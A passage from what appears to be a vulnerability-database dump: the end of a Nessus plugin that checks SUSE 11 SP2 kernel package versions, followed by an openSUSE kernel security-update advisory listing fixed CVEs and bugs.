script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7509/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7515/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7550/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7566/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7799/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7872/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-7990/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8104/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8215/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8539/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8543/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8569/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8575/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8767/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8785/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8812/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-8816/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-0723/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2069/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2143/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2184/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2185/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2186/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2188/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2384/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2543/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2544/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2545/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2546/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2547/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2548/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2549/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2782/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2847/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3134/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3137/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3138/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3139/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3140/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-3156/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-4486/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162074-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?72686f32\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP2-LTSS:zypper in -t patch\nslessp2-kernel-source-12693=1\n\nSUSE Linux Enterprise Debuginfo 11-SP2:zypper in -t patch\ndbgsp2-kernel-source-12693=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/04/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-ec2-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-default-man-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-default-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-default-base-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-default-devel-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-source-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-syms-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-trace-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-trace-base-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"kernel-trace-devel-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-ec2-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-ec2-base-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-ec2-devel-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-xen-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-pae-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-0.7.40.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"i586\", reference:\"kernel-pae-devel-3.0.101-0.7.40.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:57", "description": "The openSUSE 13.2 kernel was updated to fix various bugs and security issues.\n\nThe following security bugs were fixed :\n\n - CVE-2016-1583: Prevent the usage of mmap when the lower file system does not allow it. This could have lead to local privilege escalation when ecryptfs-utils was installed and /sbin/mount.ecryptfs_private was setuid (bsc#983143).\n\n - CVE-2016-4913: The get_rock_ridge_filename function in fs/isofs/rock.c in the Linux kernel mishandles NM (aka alternate name) entries containing \\0 characters, which allowed local users to obtain sensitive information from kernel memory or possibly have unspecified other impact via a crafted isofs filesystem (bnc#980725).\n\n - CVE-2016-4580: The x25_negotiate_facilities function in net/x25/x25_facilities.c in the Linux kernel did not properly initialize a certain data structure, which allowed attackers to obtain sensitive information from kernel stack memory via an X.25 Call Request (bnc#981267).\n\n - CVE-2016-0758: Tags with indefinite length could have corrupted pointers in asn1_find_indefinite_length (bsc#979867).\n\n - CVE-2016-2053: The asn1_ber_decoder function in lib/asn1_decoder.c in the Linux kernel allowed attackers to cause a denial of service (panic) via an ASN.1 BER file that lacks a public key, leading to mishandling by the public_key_verify_signature function in crypto/asymmetric_keys/public_key.c (bnc#963762).\n\n - CVE-2016-2187: The gtco_probe function in drivers/input/tablet/gtco.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#971919 971944).\n\n - CVE-2016-4482: The proc_connectinfo function in drivers/usb/core/devio.c in the Linux kernel did not initialize a certain data structure, which allowed local users to obtain sensitive information from kernel stack memory via a crafted USBDEVFS_CONNECTINFO ioctl call (bnc#978401 bsc#978445).\n\n - CVE-2016-4565: The InfiniBand (aka IB) stack in the Linux kernel incorrectly relies on the write system call, which allowed local users to cause a denial of service (kernel memory write operation) or possibly have unspecified other impact via a uAPI interface (bnc#979548 bsc#980363).\n\n - CVE-2016-3672: The arch_pick_mmap_layout function in arch/x86/mm/mmap.c in the Linux kernel did not properly randomize the legacy base address, which made it easier for local users to defeat the intended restrictions on the ADDR_NO_RANDOMIZE flag, and bypass the ASLR protection mechanism for a setuid or setgid program, by disabling stack-consumption resource limits (bnc#974308).\n\n - CVE-2016-4581: fs/pnode.c in the Linux kernel did not properly traverse a mount propagation tree in a certain case involving a slave mount, which allowed local users to cause a denial of service (NULL pointer dereference and OOPS) via a crafted series of mount system calls (bnc#979913).\n\n - CVE-2016-4485: The llc_cmsg_rcv function in net/llc/af_llc.c in the Linux kernel did not initialize a certain data structure, which allowed attackers to obtain sensitive information from kernel stack memory by reading a message (bnc#978821).\n\n - CVE-2015-3288: A security flaw was found in the Linux kernel that there was a way to arbitrary change zero page memory. (bnc#979021).\n\n - CVE-2016-4578: sound/core/timer.c in the Linux kernel did not initialize certain r1 data structures, which allowed local users to obtain sensitive information from kernel stack memory via crafted use of the ALSA timer interface, related to the (1) snd_timer_user_ccallback and (2) snd_timer_user_tinterrupt functions (bnc#979879).\n\n - CVE-2016-3134: The netfilter subsystem in the Linux kernel did not validate certain offset fields, which allowed local users to gain privileges or cause a denial of service (heap memory corruption) via an IPT_SO_SET_REPLACE setsockopt call (bnc#971126).\n\n - CVE-2016-4486: The rtnl_fill_link_ifmap function in net/core/rtnetlink.c in the Linux kernel did not initialize a certain data structure, which allowed local users to obtain sensitive information from kernel stack memory by reading a Netlink message (bnc#978822).\n\n - CVE-2013-7446: Use-after-free vulnerability in net/unix/af_unix.c in the Linux kernel allowed local users to bypass intended AF_UNIX socket permissions or cause a denial of service (panic) via crafted epoll_ctl calls (bnc#955654).\n\n - CVE-2016-4569: The snd_timer_user_params function in sound/core/timer.c in the Linux kernel did not initialize a certain data structure, which allowed local users to obtain sensitive information from kernel stack memory via crafted use of the ALSA timer interface (bnc#979213).\n\n - CVE-2016-2847: fs/pipe.c in the Linux kernel did not limit the amount of unread data in pipes, which allowed local users to cause a denial of service (memory consumption) by creating many pipes with non-default sizes (bnc#970948 974646).\n\n - CVE-2016-3136: The mct_u232_msr_to_state function in drivers/usb/serial/mct_u232.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted USB device without two interrupt-in endpoint descriptors (bnc#970955).\n\n - CVE-2016-2188: The iowarrior_probe function in drivers/usb/misc/iowarrior.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970956).\n\n - CVE-2016-3138: The acm_probe function in drivers/usb/class/cdc-acm.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a USB device without both a control and a data endpoint descriptor (bnc#970911).\n\n - CVE-2016-3137: drivers/usb/serial/cypress_m8.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a USB device without both an interrupt-in and an interrupt-out endpoint descriptor, related to the cypress_generic_port_probe and cypress_open functions (bnc#970970).\n\n - CVE-2016-3951: Double free vulnerability in drivers/net/usb/cdc_ncm.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (system crash) or possibly have unspecified other impact by inserting a USB device with an invalid USB descriptor (bnc#974418).\n\n - CVE-2016-3140: The digi_port_init function in drivers/usb/serial/digi_acceleport.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970892).\n\n - CVE-2016-2186: The powermate_probe function in drivers/input/misc/powermate.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970958).\n\n - CVE-2016-2185: The ati_remote2_probe function in drivers/input/misc/ati_remote2.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#971124).\n\n - CVE-2016-3689: The ims_pcu_parse_cdc_data function in drivers/input/misc/ims-pcu.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (system crash) via a USB device without both a master and a slave interface (bnc#971628).\n\n - CVE-2016-3156: The IPv4 implementation in the Linux kernel mishandles destruction of device objects, which allowed guest OS users to cause a denial of service (host OS networking outage) by arranging for a large number of IP addresses (bnc#971360).\n\n - CVE-2016-2184: The create_fixed_stream_quirk function in sound/usb/quirks.c in the snd-usb-audio driver in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference or double free, and system crash) via a crafted endpoints value in a USB device descriptor (bnc#971125).\n\n - CVE-2016-3139: The wacom_probe function in drivers/input/tablet/wacom_sys.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) via a crafted endpoints value in a USB device descriptor (bnc#970909).\n\n - CVE-2015-8830: Integer overflow in the aio_setup_single_vector function in fs/aio.c in the Linux kernel 4.0 allowed local users to cause a denial of service or possibly have unspecified other impact via a large AIO iovec. NOTE: this vulnerability exists because of a CVE-2012-6701 regression (bnc#969354 bsc#969355).\n\n - CVE-2016-2782: The treo_attach function in drivers/usb/serial/visor.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a (1) bulk-in or (2) interrupt-in endpoint (bnc#968670).\n\n - CVE-2015-8816: The hub_activate function in drivers/usb/core/hub.c in the Linux kernel did not properly maintain a hub-interface data structure, which allowed physically proximate attackers to cause a denial of service (invalid memory access and system crash) or possibly have unspecified other impact by unplugging a USB hub device (bnc#968010).\n\n - CVE-2015-7566: The clie_5_attach function in drivers/usb/serial/visor.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact by inserting a USB device that lacks a bulk-out endpoint (bnc#961512).\n\n - CVE-2016-2549: sound/core/hrtimer.c in the Linux kernel did not prevent recursive callback access, which allowed local users to cause a denial of service (deadlock) via a crafted ioctl call (bnc#968013).\n\n - CVE-2016-2547: sound/core/timer.c in the Linux kernel employs a locking approach that did not consider slave timer instances, which allowed local users to cause a denial of service (race condition, use-after-free, and system crash) via a crafted ioctl call (bnc#968011).\n\n - CVE-2016-2548: sound/core/timer.c in the Linux kernel retains certain linked lists after a close or stop action, which allowed local users to cause a denial of service (system crash) via a crafted ioctl call, related to the (1) snd_timer_close and (2) _snd_timer_stop functions (bnc#968012).\n\n - CVE-2016-2546: sound/core/timer.c in the Linux kernel uses an incorrect type of mutex, which allowed local users to cause a denial of service (race condition, use-after-free, and system crash) via a crafted ioctl call (bnc#967975).\n\n - CVE-2016-2545: The snd_timer_interrupt function in sound/core/timer.c in the Linux kernel did not properly maintain a certain linked list, which allowed local users to cause a denial of service (race condition and system crash) via a crafted ioctl call (bnc#967974).\n\n - CVE-2016-2544: Race condition in the queue_delete function in sound/core/seq/seq_queue.c in the Linux kernel allowed local users to cause a denial of service (use-after-free and system crash) by making an ioctl call at a certain time (bnc#967973).\n\n - CVE-2016-2543: The snd_seq_ioctl_remove_events function in sound/core/seq/seq_clientmgr.c in the Linux kernel did not verify FIFO assignment before proceeding with FIFO clearing, which allowed local users to cause a denial of service (NULL pointer dereference and OOPS) via a crafted ioctl call (bnc#967972).\n\n - CVE-2015-8709: ** DISPUTED ** kernel/ptrace.c in the Linux kernel mishandles uid and gid mappings, which allowed local users to gain privileges by establishing a user namespace, waiting for a root process to enter that namespace with an unsafe uid or gid, and then using the ptrace system call. NOTE: the vendor states 'there is no kernel bug here (bnc#959709 960561 ).\n\n - CVE-2015-8812: drivers/infiniband/hw/cxgb3/iwch_cm.c in the Linux kernel did not properly identify error conditions, which allowed remote attackers to execute arbitrary code or cause a denial of service (use-after-free) via crafted packets (bnc#966437).\n\n - CVE-2016-2384: Double free vulnerability in the snd_usbmidi_create function in sound/usb/midi.c in the Linux kernel allowed physically proximate attackers to cause a denial of service (panic) or possibly have unspecified other impact via vectors involving an invalid USB descriptor (bnc#966693).\n\n - CVE-2015-8785: The fuse_fill_write_pages function in fs/fuse/file.c in the Linux kernel allowed local users to cause a denial of service (infinite loop) via a writev system call that triggers a zero length for the first segment of an iov (bnc#963765).\n\n - CVE-2014-9904: The snd_compress_check_input function in sound/core/compress_offload.c in the ALSA subsystem in the Linux kernel did not properly check for an integer overflow, which allowed local users to cause a denial of service (insufficient memory allocation) or possibly have unspecified other impact via a crafted SNDRV_COMPRESS_SET_PARAMS ioctl call (bnc#986811).\n\n - CVE-2016-5829: Multiple heap-based buffer overflows in the hiddev_ioctl_usage function in drivers/hid/usbhid/hiddev.c in the Linux kernel allow local users to cause a denial of service or possibly have unspecified other impact via a crafted (1) HIDIOCGUSAGES or (2) HIDIOCSUSAGES ioctl call (bnc#986572 986573).\n\n - CVE-2016-4997: The compat IPT_SO_SET_REPLACE setsockopt implementation in the netfilter subsystem in the Linux kernel allowed local users to gain privileges or cause a denial of service (memory corruption) by leveraging in-container root access to provide a crafted offset value that triggers an unintended decrement (bnc#986362 986365 986377).\n\n - CVE-2016-4805: Use-after-free vulnerability in drivers/net/ppp/ppp_generic.c in the Linux kernel allowed local users to cause a denial of service (memory corruption and system crash, or spinlock) or possibly have unspecified other impact by removing a network namespace, related to the ppp_register_net_channel and ppp_unregister_channel functions (bnc#980371).\n\n - CVE-2016-4470: The key_reject_and_link function in security/keys/key.c in the Linux kernel did not ensure that a certain data structure is initialized, which allowed local users to cause a denial of service (system crash) via vectors involving a crafted keyctl request2 command (bnc#984755 984764).\n\n - CVE-2015-6526: The perf_callchain_user_64 function in arch/powerpc/perf/callchain.c in the Linux kernel on ppc64 platforms allowed local users to cause a denial of service (infinite loop) via a deep 64-bit userspace backtrace (bnc#942702).\n\n - CVE-2016-5244: The rds_inc_info_copy function in net/rds/recv.c in the Linux kernel did not initialize a certain structure member, which allowed remote attackers to obtain sensitive information from kernel stack memory by reading an RDS message (bnc#983213).\n\nThe following non-security bugs were fixed :\n\n - ALSA: hrtimer: Handle start/stop more properly (bsc#973378).\n\n - ALSA: pcm: Fix potential deadlock in OSS emulation (bsc#968018).\n\n - ALSA: rawmidi: Fix race at copying & updating the position (bsc#968018).\n\n - ALSA: rawmidi: Make snd_rawmidi_transmit() race-free (bsc#968018).\n\n - ALSA: seq: Fix double port list deletion (bsc#968018).\n\n - ALSA: seq: Fix incorrect sanity check at snd_seq_oss_synth_cleanup() (bsc#968018).\n\n - ALSA: seq: Fix leak of pool buffer at concurrent writes (bsc#968018).\n\n - ALSA: seq: Fix lockdep warnings due to double mutex locks (bsc#968018).\n\n - ALSA: seq: Fix race at closing in virmidi driver (bsc#968018).\n\n - ALSA: seq: Fix yet another races among ALSA timer accesses (bsc#968018).\n\n - ALSA: timer: Call notifier in the same spinlock (bsc#973378).\n\n - ALSA: timer: Code cleanup (bsc#968018).\n\n - ALSA: timer: Fix leftover link at closing (bsc#968018).\n\n - ALSA: timer: Fix link corruption due to double start or stop (bsc#968018).\n\n - ALSA: timer: Fix race between stop and interrupt (bsc#968018).\n\n - ALSA: timer: Fix wrong instance passed to slave callbacks (bsc#968018).\n\n - ALSA: timer: Protect the whole snd_timer_close() with open race (bsc#973378).\n\n - ALSA: timer: Sync timer deletion at closing the system timer (bsc#973378).\n\n - ALSA: timer: Use mod_timer() for rearming the system timer (bsc#973378).\n\n - Bluetooth: vhci: Fix race at creating hci device (bsc#971799,bsc#966849).\n\n - Bluetooth: vhci: fix open_timeout vs. hdev race (bsc#971799,bsc#966849).\n\n - Bluetooth: vhci: purge unhandled skbs (bsc#971799,bsc#966849).\n\n - Btrfs: do not use src fd for printk (bsc#980348).\n\n - Refresh patches.drivers/ALSA-hrtimer-Handle-start-stop-more-prop erly. Fix the build error on 32bit architectures.\n\n - Refresh patches.xen/xen-netback-coalesce: Restore copying of SKBs with head exceeding page size (bsc#978469).\n\n - Refresh patches.xen/xen3-patch-3.14: Suppress atomic file position updates on /proc/xen/xenbus (bsc#970275).\n\n - Subject: [PATCH] USB: xhci: Add broken streams quirk for Frescologic device id 1009 (bnc#982706).\n\n - USB: usbip: fix potential out-of-bounds write (bnc#975945).\n\n - af_unix: Guard against other == sk in unix_dgram_sendmsg (bsc#973570).\n\n - backends: guarantee one time reads of shared ring contents (bsc#957988).\n\n - btrfs: do not go readonly on existing qgroup items (bsc#957052).\n\n - btrfs: remove error message from search ioctl for nonexistent tree.\n\n - drm/i915: Fix missing backlight update during panel disablement (bsc#941113 boo#901754).\n\n - enic: set netdev->vlan_features (bsc#966245).\n\n - ext4: fix races between buffered IO and collapse / insert range (bsc#972174).\n\n - ext4: fix races between page faults and hole punching (bsc#972174).\n\n - ext4: fix races of writeback with punch hole and zero range (bsc#972174).\n\n - ext4: move unlocked dio protection from ext4_alloc_file_blocks() (bsc#972174).\n\n - ipv4/fib: do not warn when primary address is missing if in_dev is dead (bsc#971360).\n\n - ipvs: count pre-established TCP states as active (bsc#970114).\n\n - net: core: Correct an over-stringent device loop detection (bsc#945219).\n\n - netback: do not use last request to determine minimum Tx credit (bsc#957988).\n\n - pciback: Check PF instead of VF for PCI_COMMAND_MEMORY.\n\n - pciback: Save the number of MSI-X entries to be copied later.\n\n - pciback: guarantee one time reads of shared ring contents (bsc#957988).\n\n - series.conf: move cxgb3 patch to network drivers section\n\n - usb: quirk to stop runtime PM for Intel 7260 (bnc#984464).\n\n - x86: standardize mmap_rnd() usage (bnc#974308).", "cvss3": {}, "published": "2016-08-25T00:00:00", "type": "nessus", "title": "openSUSE Security Update : the Linux Kernel (openSUSE-2016-1015)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-6701", "CVE-2013-7446", "CVE-2014-9904", "CVE-2015-3288", "CVE-2015-6526", "CVE-2015-7566", "CVE-2015-8709", 